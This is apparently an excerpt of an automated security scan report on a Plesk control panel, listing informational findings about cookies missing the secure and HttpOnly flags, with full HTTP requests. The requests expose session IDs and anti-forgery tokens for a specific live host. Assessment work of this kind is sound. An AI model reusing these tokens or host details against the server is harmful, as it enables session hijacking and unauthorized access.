User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/server/firewall_interface.php
Cookie: rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=tools

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:04:09 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:04:09 GMT
Content-Length: 29098

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.131. https://50.22.21.242:8443/server/firewall_interface.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /server/firewall_interface.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/firewall_interface.php HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/plesk/server/firewall/
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=tools

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:03:45 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:03:45 GMT
Content-Length: 49255

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.132. https://50.22.21.242:8443/server/firewall_rule_edit.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /server/firewall_rule_edit.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/firewall_rule_edit.php HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; sessionID=ouhymmzgtdaqakoglnanbrbl; form-nal-aps-catalog-search-show=false; psaContext=tools

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:49:22 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:49:25 GMT
Connection: close
Content-Length: 20899

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.133. https://50.22.21.242:8443/sessions/tssessions_info.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /sessions/tssessions_info.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sessions/tssessions_info.php?id=1 HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/ts-sessions/
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:26:55 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:26:55 GMT
Connection: close
Content-Length: 16151

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.134. https://50.22.21.242:8443/smb/app/available/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /smb/app/available/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /smb/app/available/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/app/available/
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard

packager=&catalogType=apscatalog&vendor=&name=&catalogId=&forgery_protection_token=08df00b29ee0b3a2ea9df3920a2d8466&packageId=&release=&version=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:35:37 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 9827

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.135. https://50.22.21.242:8443/smb/app/market/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /smb/app/market/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /smb/app/market/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/app/market/
Content-Type: application/x-www-form-urlencoded
Content-Length: 156
Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard

packager=&catalogType=marketplace&vendor=&name=&catalogId=marketplace&forgery_protection_token=08df00b29ee0b3a2ea9df3920a2d8466&packageId=&release=&version=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:29:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 9824

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.136. https://50.22.21.242:8443/smb/app/market/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /smb/app/market/id/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /smb/app/market/id/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/app/market/id/
Content-Type: application/x-www-form-urlencoded
Content-Length: 156
Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard

packager=&catalogType=marketplace&vendor=&name=&catalogId=marketplace&forgery_protection_token=08df00b29ee0b3a2ea9df3920a2d8466&packageId=&release=&version=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:32:34 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 9827

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.137. https://50.22.21.242:8443/smb/app/market/id/marketplace  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /smb/app/market/id/marketplace

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /smb/app/market/id/marketplace HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/app/market/id/marketplace
Content-Type: application/x-www-form-urlencoded
Content-Length: 156
Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard

packager=&catalogType=marketplace&vendor=&name=&catalogId=marketplace&forgery_protection_token=08df00b29ee0b3a2ea9df3920a2d8466&packageId=&release=&version=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:34:50 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 9838

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.138. https://50.22.21.242:8443/smb/database/create-user/databaseId/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /smb/database/create-user/databaseId/1

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; sessionID=ouhymmzgtdaqakoglnanbrbl; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; psaContext=tools; PLESKSESSID=05f76d98be673cb6f1e57430536e3b51

passwordConfirmation=&hidden=&name=&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&x=1&y=1&password=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:14:16 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 9846

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.139. https://50.22.21.242:8443/smb/service/delete/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /smb/service/delete/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /smb/service/delete/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/app/installed
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard

forgery_protection_token=&ids%5b%5d=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:38:22 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:38:24 GMT
Connection: close
Content-Length: 16551

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.140. https://50.22.21.242:8443/smb/web/settings/id/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /smb/web/settings/id/1

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /smb/web/settings/id/1 HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/web/settings/id/1
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard

hidden=&forgery_protection_token=08df00b29ee0b3a2ea9df3920a2d8466&forwardingSettings%5bforwardingType%5d=frm_fwd&domainName=z.xss.cx&x=1&y=1&forwardingSettings%5bforwardTo%5d=555-555-0199@example.com

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:41:07 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10018

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.141. https://50.22.21.242:8443/spaw/spaw.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /spaw/spaw.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /spaw/spaw.php?file_name=/statistics/anon_ftpstat/index.html HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/?cmd=chdir&file=%2Fstatistics%2Fanon_ftpstat%2F
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=home

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:09:24 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:09:24 GMT
Connection: close
Content-Length: 65174

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.142. https://50.22.21.242:8443/sso/api.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /sso/api.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /sso/api.php?api=/ui HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/relay
Content-Type: application/x-www-form-urlencoded
Content-Length: 1049
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; PLESKSESSID=fdc805bab286eabea1727fc24c0cf1ff; psaContext=home

RefererPort=8443&response_url=https%3a%2f%2f50.22.21.242%3a8443%2frelay&request_id=t3wyh19bjjmf3s7vc4gctajodna3hyj8jd&ui_type=idp_login&sp_id=wz3hi7xjcjcxqv36hlpzepay4dnadvked19&RefererScheme=https&me
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:00:54 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 6807

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 142 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



